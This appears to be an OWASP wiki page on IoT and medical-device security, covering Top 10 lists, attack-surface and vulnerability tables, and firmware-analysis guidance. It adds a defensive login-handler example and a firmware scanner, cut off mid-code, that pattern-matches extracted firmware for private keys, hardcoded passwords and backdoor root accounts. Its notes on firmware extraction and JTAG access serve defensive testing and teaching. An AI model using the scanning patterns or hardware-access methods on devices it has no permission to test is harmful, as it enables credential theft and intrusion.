| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for outdated software versions and the known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single, static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physical)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented but is misconfigured or not kept up to date, e.g. the service still accepts SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Desoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a great deal of useful information: source code and binaries of the running services, preset passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With a JTAG adapter and gdb an attacker can alter the execution of the firmware on the device and bypass almost all software-based security controls.<br />
* Fault injection (glitching) can likewise alter the execution flow, and side-channel analysis can be used to leak secrets such as keys from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface an attacker can often obtain full console access to the device<br />
* The usual countermeasure is a custom bootloader that prevents dropping into single-user mode, but this can frequently be bypassed as well.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
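The credential-management items that recur in the tables above (username enumeration, weak and default passwords, missing account lockout) come down to a handful of controls in the device's login handler. The following is an added example, not code from the OWASP IoT project or from any vendor; the account name, the passwords and the default-credential list are constructed for illustration:<br />
<br />
```python
"""Device-side login handler covering the credential-management rows above.

Added example, not code from the OWASP IoT project. Usernames, passwords and
the default-credential list below are constructed for illustration.
"""
import hashlib
import hmac
import os
import time

# Constructed list of factory defaults the device must refuse to keep.
KNOWN_DEFAULTS = {"admin", "password", "1234", "12345", "123456", "root"}
MIN_PASSWORD_LEN = 12
MAX_FAILURES = 5         # consecutive failures before lockout
BASE_LOCK_SECONDS = 30   # lockout doubles with every further failure (capped)
MAX_LOCK_DOUBLINGS = 6


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; returns (salt, digest)."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest


class DeviceAuth:
    def __init__(self, clock=time.monotonic):
        self._clock = clock
        self._users = {}          # username -> (salt, digest)
        self._failures = {}       # username -> consecutive failures
        self._locked_until = {}   # username -> monotonic time
        # Dummy credential so an unknown username costs a PBKDF2 run too:
        # no timing difference an attacker could use to enumerate accounts.
        self._dummy = hash_password("not-a-real-password")

    def password_acceptable(self, password):
        """Reject short passwords and anything on the default/common list."""
        return (len(password) >= MIN_PASSWORD_LEN
                and password.lower() not in KNOWN_DEFAULTS)

    def set_password(self, username, password):
        if not self.password_acceptable(password):
            raise ValueError("password too short or is a known default")
        self._users[username] = hash_password(password)

    def login(self, username, password):
        """Return 'ok', 'denied' or 'locked'.

        The same 'denied' is returned for a wrong password and for an unknown
        user, and lockout is tracked per submitted username whether or not it
        exists, so the responses do not reveal which accounts are real.
        """
        now = self._clock()
        if self._locked_until.get(username, 0) > now:
            return "locked"
        salt, stored = self._users.get(username, self._dummy)
        _, candidate = hash_password(password, salt)
        # constant-time comparison of the digests
        if username in self._users and hmac.compare_digest(candidate, stored):
            self._failures.pop(username, None)
            return "ok"
        n = self._failures.get(username, 0) + 1
        self._failures[username] = n
        if n >= MAX_FAILURES:
            doublings = min(n - MAX_FAILURES, MAX_LOCK_DOUBLINGS)
            self._locked_until[username] = now + BASE_LOCK_SECONDS * 2 ** doublings
        return "denied"


if __name__ == "__main__":
    auth = DeviceAuth()
    auth.set_password("operator", "correct horse battery staple")
    print(auth.login("operator", "admin"))                          # denied
    print(auth.login("operator", "correct horse battery staple"))   # ok
```
<br />
The trade-off a practitioner should keep in mind: a per-username lockout lets an attacker who knows a username deny service to that account, and tracking failures for every submitted username needs a bounded store (an LRU or a per-source cap) on a memory-constrained device. Temporary, doubling lockouts rather than permanent ones keep both problems manageable.<br />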
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single, static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
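The "File system analysis" step above, once binwalk or a similar tool has extracted the root filesystem, is mostly a search for the items in the "Device Firmware Vulnerabilities" row: hardcoded credentials, private keys, backdoor accounts and version banners of out-of-date core components. The following is an added example of that search in the style of Firmwalker; it is not the OWASP project's or Firmwalker's own code. It assumes the extracted filesystem is in a local directory, and the mini root it builds for demonstration is constructed here and does not come from any real device:<br />
<br />
```python
"""Firmwalker-style scan of an extracted firmware root filesystem.

Added example, not the OWASP project's or Firmwalker's own code. It assumes
the filesystem has already been extracted (for example with binwalk -e) into a
directory. The sample root built by build_sample_root() is constructed here and
does not come from any real device.
"""
import re
import tempfile
from pathlib import Path

PATTERNS = {
    "private_key": re.compile(rb"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    "certificate": re.compile(rb"-----BEGIN CERTIFICATE-----"),
    "hardcoded_password": re.compile(
        rb"(?i)\b(?:passw(?:or)?d|pwd|secret)\s*[=:]\s*['\"]?[^\s'\"]{3,}"),
    "url": re.compile(rb"https?://[\w.\-]+(?:/[\w./\-?=&%]*)?"),
    "ipv4": re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    # version banners of core components, to compare against known CVEs
    "version_banner": re.compile(
        rb"(?:BusyBox|OpenSSL|OpenSSH|dropbear|lighttpd)[ _v]+\d+\.\d+(?:\.\d+)?[a-z]?"),
}
INTERESTING_FILES = {"passwd", "shadow", "authorized_keys", "id_rsa", "id_dsa",
                     "dropbear_rsa_host_key", "wpa_supplicant.conf"}
MAX_FILE_SIZE = 4 * 1024 * 1024  # skip large blobs such as kernel images


def scan_account_file(data, has_uid):
    """Flag usable password hashes, empty passwords and extra uid-0 accounts in
    /etc/passwd (has_uid=True) or /etc/shadow (has_uid=False)."""
    findings = []
    for line in data.splitlines():
        fields = line.split(b":")
        if len(fields) < 2:
            continue
        user, pw = fields[0].decode(errors="replace"), fields[1]
        if pw == b"":
            findings.append(("empty_password", user))
        elif pw not in (b"x", b"*", b"!", b"!!"):
            findings.append(("password_hash", user))   # crackable offline
        if has_uid and len(fields) > 2 and fields[2] == b"0" and user != "root":
            findings.append(("extra_uid0", user))      # backdoor root account
    return findings


def scan_firmware_root(root):
    """Walk the extracted root and return (kind, relative_path, detail) tuples."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_symlink() or not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name in INTERESTING_FILES:
            findings.append(("interesting_file", rel, path.name))
        if path.stat().st_size > MAX_FILE_SIZE:
            continue
        data = path.read_bytes()
        if path.name in ("passwd", "shadow"):
            for kind, user in scan_account_file(data, has_uid=(path.name == "passwd")):
                findings.append((kind, rel, user))
        for kind, pattern in PATTERNS.items():
            for m in pattern.finditer(data):
                findings.append((kind, rel, m.group(0)[:60].decode(errors="replace")))
    return findings


def build_sample_root(base):
    """Constructed mini root filesystem standing in for a binwalk extraction."""
    files = {
        "etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n"
                      b"support:$1$c0nst$ructedhash:0:0::/:/bin/sh\n"
                      b"nobody:*:99:99::/:/bin/false\n",
        "etc/shadow": b"root:$1$c0nst$ructedhash:0:0:99999:7:::\n"
                      b"support::0:0:99999:7:::\n",
        "etc/config/cloud.conf": b"server=https://api.example-iot.test/v1\n"
                                 b"ntp=192.0.2.10\npassword = hunter22\n",
        "etc/ssl/device.key": b"-----BEGIN RSA PRIVATE KEY-----\nMIIE...\n"
                              b"-----END RSA PRIVATE KEY-----\n",
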